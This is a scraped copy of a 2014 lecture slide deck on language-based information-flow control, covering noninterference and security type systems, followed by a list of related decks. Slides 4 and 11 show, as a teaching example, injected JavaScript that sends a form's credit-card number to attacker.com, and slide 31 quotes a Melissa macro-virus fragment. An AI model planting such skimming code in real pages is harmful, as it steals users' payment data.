from theory to practice of information flow control
play

From theory to practice of information-flow control Andrei - PowerPoint PPT Presentation

Mar 14, 2024 •346 likes •931 views

From theory to practice of information-flow control Andrei Sabelfeld Chalmers http://www.cse.chalmers.se/~andrei FOSAD 2014 2 <!-- Input validation --> <form name="cform" action="script.cgi"

  1. From theory to practice of information-flow control Andrei Sabelfeld Chalmers http://www.cse.chalmers.se/~andrei FOSAD 2014

  2. 2

  3. <!-- Input validation --> <form name="cform" action="script.cgi" method="post" onsubmit="return sendstats ();"> <script type="text/javascript"> function sendstats () {…} </script> 3

  4. Attack <script type="text/javascript"> function sendstats () { new Image().src= "http://attacker.com/log.cgi?card="+ encodeURI(form.CardNumber.value);} </script> • Root of the problem: information flow from secret to public 4

  5. Root of problem: information flow Browser Internet DOM Script tree 5

  6. Origin-based restrictions Browser Internet DOM Script tree • Often too restrictive 6

  7. Relaxing origin-based restrictions Browser Internet DOM Script tree • Introduces security risks • Cf. SOP 7

  8. Information flow controls Browser Internet DOM Script tree 8

  9. Information flow controls Browser Internet DOM Script tree 9

  10. Need for information release (declassification) ebay.com Browser Internet DOM Script tree google- analytics.com 10

  11. Information flow public:=0 problem if secret • Studied in 70 ’ s Insecure even when • military systems public:=1 “ then ” branch not • Revival in 90 ’ s taken – implicit flow • mobile code print(public) • Hot topic in language- <!-- Input validation --> based security <form name="cform" action="script.cgi" method="post" onsubmit="return • web application sendstats();"> security <script type="text/ javascript"> function sendstats () {… new Image().src="http://attacker.com/log.cgi?card="+ encodeURI(form.CardNumber.value); } 11 </script>

  12. Course outline 1. Language-Based Security: motivation 2. Language-Based Information-Flow Security: the big picture 3. Dimensions and principles of declassification 4. Dynamic vs. static security enforcement 5. Tracking information flow in web applications 6. Information-flow challenge 12

  13. General problem: malicious and/or buggy code is a threat • Trends in software – mobile code, executable content – platform-independence – extensibility • These trends are attackers ’ opportunities! – easy to distribute worms, viruses, exploits,... – write (an attack) once, run everywhere – systems are vulnerable to undesirable modifications • Need to keep the trends without compromising information security 13

  14. Today ’ s computer security mechanisms: an analogy 14

  15. Today ’ s attacker: an analogy 15

  16. Defense against Malicious Code • Analyze the code and reject in case of potential harm • Rewrite the code before executing to avoid potential harm • Monitor the code and stop before it does harm (e.g., JVM) • Audit the code during executing and take policing action if it did harm 16

  17. Computer Security • years of theory & • The CIA formal methods • revival of interest: – Confidentiality Mobile Code – Integrity – Availability 17

  18. Information security: confidentiality • Confidentiality: sensitive information must not be leaked by computation (non-example: spyware attacks) • End-to-end confidentiality: there is no insecure information flow through the system • Standard security mechanisms provide no end-to-end guarantees – Security policies too low-level (legacy of OS-based security mechanisms) – Programs treated as black boxes 18

  19. Confidentiality: standard security mechanisms Access control +prevents “ unauthorized ” release of information - but what process should be authorized? Firewalls +permit selected communication - permitted communication might be harmful Encryption +secures a communication channel - even if properly used, endpoints of communication may leak data 19

  20. Confidentiality: standard security mechanisms Antivirus scanning +rejects a “ black list ” of known attacks - but doesn ’ t prevent new attacks Digital signatures +help identify code producer -no security policy or security proof guaranteed Sandboxing/OS-based monitoring +good for low-level events (such as read a file) -programs treated as black boxes ) Useful building blocks but no end-to-end security guarantee 20

  21. Confidentiality: language- based approach • Counter application-level attacks at the level of a programming language—look inside the black box! Immediate benefits: • Semantics-based security specification – End-to-end security policies – Powerful techniques for reasoning about semantics • Program security analysis – Analysis enforcing end-to-end security – Track information flow via security types – Type checking can be done dynamically and statically 21

  22. Dynamic security enforcement Java ’ s sandbox, OS-based monitoring, and Mandatory Access Control dynamically enforce security policies; But: implicit flow h:=…; high(secret) from h to l l:=false; if h then l:=true low(public) else skip; out(l) Problem: insecure even when nothing is assigned to l inside the if! 22

  23. Static certification • Only run programs which can be statically verified as secure before running them • Static certification for inclusion in a compiler [Denning&Denning ’ 77] • Implicit flow analysis • Enforcement by security-type systems 23

  24. Security type system • Prevents explicit flows: may not use high variables l:=… • Prevents implicit flows; no public side effects when branching on secrets: if e then while e do may not may not assign to l assign to l … … 24

  25. A security-type system h ∉ Vars(exp) exp : high Expressions: exp : low Atomic commands (pc represents context): [pc] ` skip exp : low [low] ` l := exp [pc] ` h:=exp context 25

  26. A security-type system: Compositional rules [high] ` C [pc] ` C 1 [pc] ` C 2 [low] ` C [pc] ` C 1 ; C 2 implicit exp:pc [pc] ` C 1 [pc] ` C 2 flows: [pc] ` if exp then C 1 else C 2 branches of a high if must be exp:pc [pc] ` C typable in a high [pc] ` while exp do C context 26

  27. A security-type system: Examples [low] ` h:=l+4; l:=l-5 [pc] ` if h then h:=h+7 else skip [low] ` while l<34 do l:=l+1 [pc] ` while h<4 do l:=l+1 27

  28. Type Inference: Example 5 : low 3 : low [high ] ` h:=h+1 [low] ` l:=5, [low] ` l:=3, l=0: low [low] ` h:=h+1 [low] ` if l=0 then l:=5 else l:=3 [low] ` h:=h+1; if l=0 then l:=5 else l:=3 28

  29. What does the type system guarantee? • Type soundness: Soundness theorem: what does it [pc] ` C ) C is secure mean? 29

  30. Semantics-based security • What end-to-end policy such a type system guarantees (if any)? • Semantics-based specification of information-flow security [Cohen ’ 77] , generally known as noninterference [Goguen&Meseguer ’ 82] : A program is secure iff high inputs do not interfere with low-level view of the system 30

  31. Confidentiality: assumptions (simplified) • Simple security structure (easy to secret (high) generalize to arbitrary lattices) public (low) • Variables partitioned: high and low • Intended security: low-level observations reveal nothing about high-level input: high high Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", low low "HKEY_CURRENT_USER\... ... 'WORD/Melissa 31

  32. Confidentiality for sequential programs: noninterference • Noninterference [Goguen & Meseguer]: as high input varied, low-level outputs unchanged h 1 h 2 h 1 ’ h 2 ’ l l l’ l’ • How do we formalize noninterference in terms of program semantics? nontermintation « C ¬ : Int £ Int ! (Int £ Int) ? high input low input high output low output 32

  33. Noninterference • As high input varied, low-level behavior unchanged C is secure iff 8 mem,mem’ . mem = L mem’ ) « C ¬ mem ¼ L « C ¬ mem’ Low view ¼ L : Low-memory equality: C ’ s behavior: indistinguishability (h,l) = L (h ’ ,l ’ ) iff l=l ’ semantics « C ¬ by attacker 33

  34. Semantics-based security • What is ¼ L for our language? • Depends on what the attacker can observe • For what ¼ L does the type system enforce security ([pc] ` C ) C is secure)? Suitable candidate for ¼ L : mem ¼ L mem ’ iff mem ≠ ? ≠ mem ’ ) mem = L mem ’ 34

  35. Confidentiality: Examples l:=h insecure (direct) untypable l:=h; l:=0 secure untypable h:=l; l:=h secure untypable if h=0 then l:=0 insecure untypable (indirect) else l:=1 while h=0 do skip secure (up to typable termination) if h=0 then secure (up to typable sleep(1000) timing) 35

  36. Course outline 1. Language-Based Security: motivation 2. Language-Based Information-Flow Security: the big picture 3. Dimensions and principles of declassification 4. Dynamic vs. static security enforcement 5. Tracking information flow in web applications 6. Information-flow challenge 36

Recommend

Dataflow analysis Theory and Applications cs6463 1 Control-flow graph Graphical

Dataflow analysis Theory and Applications cs6463 1 Control-flow graph Graphical

Dataflow analysis Theory and Applications cs6463 1 Control-flow graph Graphical representation of runtime control-flow paths Nodes of graph: basic blocks (straight-line computations) Edges of graph: flows of control Useful for

679 views • 39 slides
with Deferrable constraints in Haskell through the tale of a Haskell information flow control

with Deferrable constraints in Haskell through the tale of a Haskell information flow control

Gradually typed DSLs with Deferrable constraints in Haskell through the tale of a Haskell information flow control library Pablo Buiras, Alejandro Russo, Dimitrios Vytiniotis Information flow control 101 Non- interference:

465 views • 31 slides
Ni Nickel A Framework for Design and Verification of Information Flow Control Systems Helgi

Ni Nickel A Framework for Design and Verification of Information Flow Control Systems Helgi

Ni Nickel A Framework for Design and Verification of Information Flow Control Systems Helgi Sigurbjarnarson , Luke Nelson, Bruno Castro-Karney, James Bornholt, Emina Torlak, and Xi Wang .org Enforcing information flow control is critical

1.02k views • 58 slides
Theory or Practice? Theory : Without theory, practice is but routine born out of habit.

Theory or Practice? Theory : Without theory, practice is but routine born out of habit.

Theory or Practice? Theory : Without theory, practice is but routine born out of habit. Theory alone can bring forth and develop the spirit of inventions Louis Pasteur, 1822-1895 Practice : It is a capital mistake to theorize before

548 views • 42 slides
Information Theory and Security: Quantitative Information Flow Pasquale Malacaria

Information Theory and Security: Quantitative Information Flow Pasquale Malacaria

Information Theory and Security: Quantitative Information Flow Pasquale Malacaria pm@dcs.qmul.ac.uk School of Electronic Engineering and Computer Science Queen Mary University of London Information Theory and Security: Quantitative Information

835 views • 54 slides
1 What Is Control-Flow Analysis? Loop Concepts Control-flow analysis discovers the flow of

1 What Is Control-Flow Analysis? Loop Concepts Control-flow analysis discovers the flow of

Control-Flow Analysis and Loop Detection Context Last time Data-flow Speeding up data-flow analysis Flow of data values from defs to uses Could alternatively be represented as a data dependence Today Control-flow analysis

516 views • 5 slides
Information flow control 1 D. Denning and P. Denning Certification of Programs for Secure

Information flow control 1 D. Denning and P. Denning Certification of Programs for Secure

Secure Architecture Principles Information flow control 1 D. Denning and P. Denning Certification of Programs for Secure Information Flow (CACM 1976) Review Access Control Discretionary access control (DAC) Philosophy: users have

321 views • 16 slides
Flow and Congestion Control CS 218 F2003 Oct 29, 03 Flow control goals Classification

Flow and Congestion Control CS 218 F2003 Oct 29, 03 Flow control goals Classification

Flow and Congestion Control CS 218 F2003 Oct 29, 03 Flow control goals Classification and overview of main techniques TCP Tahoe, Reno, Vegas TCP Westwood Readings: (1) Keshavs book Chapter on Flow Control; (2)

374 views • 22 slides
Control flow Conditionals and Control Flow l A conditional branch

Control flow Conditionals and Control Flow l A conditional branch

10/2/15 Control flow Conditionals and Control Flow l A conditional branch is sufficient to implement most control Condition codes flow constructs offered in higher

356 views • 12 slides
Going with the Flow: Bridging the Gap between Theory and Practice in Physical Design Patrick

Going with the Flow: Bridging the Gap between Theory and Practice in Physical Design Patrick

Going with the Flow: Bridging the Gap between Theory and Practice in Physical Design Patrick Groeneveld, Chief Technologist, Magma Design Automation ISPD 2010 San Francisco Overview: Physical Design Flows The Nature of the PD problem

249 views • 21 slides
1 Why Why flow flow control? control? sender

1 Why Why flow flow control? control? sender

Lecture 7. Lecture 7. TCP mechanisms for: TCP mechanisms for: data transfer control / flow control error control congestion control Graphical examples (applet java) of several algorithms at:

589 views • 13 slides
Motivation Intra-procedural analysis depends upon accurate control-flow information. In the

Motivation Intra-procedural analysis depends upon accurate control-flow information. In the

Motivation Intra-procedural analysis depends upon accurate control-flow information. In the presence of certain language features (e.g. indirect calls) it is nontrivial to predict accurately how control may flow at execution time the nave

594 views • 42 slides
Flow of Control Flow of Control Recitation 09/(11,12)/2008 CS 180 CS 180 Department of

Flow of Control Flow of Control Recitation 09/(11,12)/2008 CS 180 CS 180 Department of

Flow of Control Flow of Control Recitation 09/(11,12)/2008 CS 180 CS 180 Department of Computer Science, Purdue University Project 2 j Now posted on the class webpage. Due Wed, Sept. 17 at 10 pm. Start early All

663 views • 22 slides
Compression: Information Theory Greg Plaxton Theory in Programming Practice, Spring 2004

Compression: Information Theory Greg Plaxton Theory in Programming Practice, Spring 2004

Compression: Information Theory Greg Plaxton Theory in Programming Practice, Spring 2004 Department of Computer Science University of Texas at Austin Coding Theory Encoder Input: a message over some finite alphabet such as { 0 , 1 } or

579 views • 15 slides
Compression: Information Theory Greg Plaxton Theory in Programming Practice, Spring 2005

Compression: Information Theory Greg Plaxton Theory in Programming Practice, Spring 2005

Compression: Information Theory Greg Plaxton Theory in Programming Practice, Spring 2005 Department of Computer Science University of Texas at Austin Coding Theory Encoder Input: a message over some finite alphabet such as { 0 , 1 } or

162 views • 15 slides
Compression: Information Theory Greg Plaxton Theory in Programming Practice, Fall 2005

Compression: Information Theory Greg Plaxton Theory in Programming Practice, Fall 2005

Compression: Information Theory Greg Plaxton Theory in Programming Practice, Fall 2005 Department of Computer Science University of Texas at Austin Coding Theory Encoder Input: a message over some finite alphabet such as { 0 , 1 } or {

560 views • 15 slides
Information flow control for the web Prof. Frank PIESSENS Overview The web platform Web

Information flow control for the web Prof. Frank PIESSENS Overview The web platform Web

Information flow control for the web Prof. Frank PIESSENS Overview The web platform Web script security: threats and countermeasures A formal model of web scripts Information flow security Secure multi-execution The

2.25k views • 131 slides
Programming in C 1 Flow of Control Flow of control The order in which statements are

Programming in C 1 Flow of Control Flow of control The order in which statements are

Programming in C 1 Flow of Control Flow of control The order in which statements are executed Transfer of control When the next statement executed is not the next one in sequence 2 Flow of Control Control structures

540 views • 34 slides
V3 1/3/2015 Programming in C 1 Flow of Control Flow of control The order in which

V3 1/3/2015 Programming in C 1 Flow of Control Flow of control The order in which

V3 1/3/2015 Programming in C 1 Flow of Control Flow of control The order in which statements are executed Transfer of control When the next statement executed is not the next one in sequence 2 Flow of Control Control

310 views • 12 slides
Delimited Control with Multiple Prompts in Theory and Practice Paul Downen Zena M. Ariola

Delimited Control with Multiple Prompts in Theory and Practice Paul Downen Zena M. Ariola

Delimited Control with Multiple Prompts in Theory and Practice Paul Downen Zena M. Ariola University of Oregon HOPE14 August 31, 2014 1/27 Crash course on control 2/27 Separating a redex from its evaluation context 1 + 2 + ( 3 4 )

793 views • 50 slides
Exceptional Control Flow: Hardware support for reacting to the rest of the world. Control Flow

Exceptional Control Flow: Hardware support for reacting to the rest of the world. Control Flow

Exceptional Control Flow: Hardware support for reacting to the rest of the world. Control Flow Processor: read instruction, execute it, go to next instruction, repeat Physical control flow Explicit changes: Jumps (conditional, unconditional)

428 views • 8 slides
Towards a Theory of Information Flow -Transducers in the Finitary Process Soup Dynamics

Towards a Theory of Information Flow -Transducers in the Finitary Process Soup Dynamics

Information Flow Spencer Mathews Towards a Theory of Information Flow -Transducers in the Finitary Process Soup Dynamics Single State Soup Evolution Channel Capacity Spencer Mathews Partitioning Metamachine Department of Computer

457 views • 29 slides
ex 1. compare and test : conditions Aside: save conditions b,a computes a - b , sets flags,

ex 1. compare and test : conditions Aside: save conditions b,a computes a - b , sets flags,

Conditionals and Control Flow Two key pieces 1. Comparisons and tests: check conditions 2. Transfer control: choose next instruction Control flow Processor Control-Flow State Familiar C constructs Condition codes (a.k.a. flags ) if else l

191 views • 8 slides
Control Structures Lecture 4 COP 3014 Fall 2020 September 10, 2020 Control Flow Control flow

Control Structures Lecture 4 COP 3014 Fall 2020 September 10, 2020 Control Flow Control flow

Control Structures Lecture 4 COP 3014 Fall 2020 September 10, 2020 Control Flow Control flow refers to the specification of the order in which the individual statements, instructions or function calls of an imperative program are executed or

333 views • 19 slides

More recommend